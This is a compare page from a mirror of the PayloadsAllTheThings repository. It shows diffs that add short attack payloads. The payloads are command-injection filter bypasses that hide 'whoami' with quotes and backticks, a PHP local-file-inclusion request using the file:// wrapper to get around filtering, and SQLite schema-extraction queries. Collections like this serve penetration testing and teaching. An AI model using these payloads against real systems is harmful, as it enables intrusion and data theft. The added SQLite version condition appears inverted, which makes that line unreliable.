mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-05-09 11:46:14 +02:00
Compare commits
6 Commits
e26831d06c
...
6145d1a987
Author | SHA1 | Date | |
---|---|---|---|
n3rada | 6145d1a987 | ||
Swissky | 80dda8beeb | ||
Swissky | 8ef458db2a | ||
mohnad banat | d834abe43c | ||
xplo1t-sec | 033982dc30 | ||
n3rada | d658aa026a |
|
@ -18,6 +18,7 @@
|
|||
* [Bypass blacklisted words](#bypass-blacklisted-words)
|
||||
* [Bypass with single quote](#bypass-with-single-quote)
|
||||
* [Bypass with double quote](#bypass-with-double-quote)
|
||||
* [Bypass with backticks](#bypass-with-backticks)
|
||||
* [Bypass with backslash and slash](#bypass-with-backslash-and-slash)
|
||||
* [Bypass with $@](#bypass-with-)
|
||||
* [Bypass with $()](#bypass-with--1)
|
||||
|
@ -245,12 +246,20 @@ root:x:0:0:root:/root:/bin/bash
|
|||
|
||||
```powershell
|
||||
w'h'o'am'i
|
||||
wh''oami
|
||||
```
|
||||
|
||||
#### Bypass with double quote
|
||||
|
||||
```powershell
|
||||
w"h"o"am"i
|
||||
wh""oami
|
||||
```
|
||||
|
||||
#### Bypass with backticks
|
||||
|
||||
```powershell
|
||||
wh``oami
|
||||
```
|
||||
|
||||
#### Bypass with backslash and slash
|
||||
|
|
|
@ -151,6 +151,14 @@ When `allow_url_include` and `allow_url_fopen` are set to `Off`. It is still pos
|
|||
|
||||
## LFI / RFI using wrappers
|
||||
|
||||
### Wrapper file://
|
||||
It is possible to use the [`file://`]([url](https://www.php.net/manual/en/wrappers.file.php)) wrapper in order to read file inside allowed paths (if `open_basedir` restriction in effect).
|
||||
|
||||
```shell
|
||||
http://example.com/index.php?filename=file://localhost/var/www/html/secured_extranet/panel/security.php
|
||||
```
|
||||
Note that using `localhost` above bypasses `file:///` filtering.
|
||||
|
||||
### Wrapper php://filter
|
||||
|
||||
The part "`php://filter`" is case insensitive
|
||||
|
@ -623,4 +631,4 @@ If SSH is active check which user is being used `/proc/self/status` and `/etc/pa
|
|||
* [PHP FILTERS CHAIN: WHAT IS IT AND HOW TO USE IT - Rémi Matasse - 18/10/2022](https://www.synacktiv.com/publications/php-filters-chain-what-is-it-and-how-to-use-it.html)
|
||||
* [PHP FILTER CHAINS: FILE READ FROM ERROR-BASED ORACLE - Rémi Matasse - 21/03/2023](https://www.synacktiv.com/en/publications/php-filter-chains-file-read-from-error-based-oracle.html)
|
||||
* [One Line PHP: From Genesis to Ragnarök - Ginoah, Bookgin](https://hackmd.io/@ginoah/phpInclude#/)
|
||||
* [Introducing wrapwrap: using PHP filters to wrap a file with a prefix and suffix - Charles Fol - 11 December, 2023](https://www.ambionics.io/blog/wrapwrap-php-filters-suffix)
|
||||
* [Introducing wrapwrap: using PHP filters to wrap a file with a prefix and suffix - Charles Fol - 11 December, 2023](https://www.ambionics.io/blog/wrapwrap-php-filters-suffix)
|
||||
|
|
|
@ -33,7 +33,10 @@ select sqlite_version();
|
|||
```sql
|
||||
SELECT sql FROM sqlite_schema
|
||||
```
|
||||
|
||||
if sqlite_version > 3.33.0
|
||||
```sql
|
||||
SELECT sql FROM sqlite_master
|
||||
```
|
||||
## Integer/String based - Extract table name
|
||||
|
||||
```sql
|
||||
|
|
Loading…
Reference in New Issue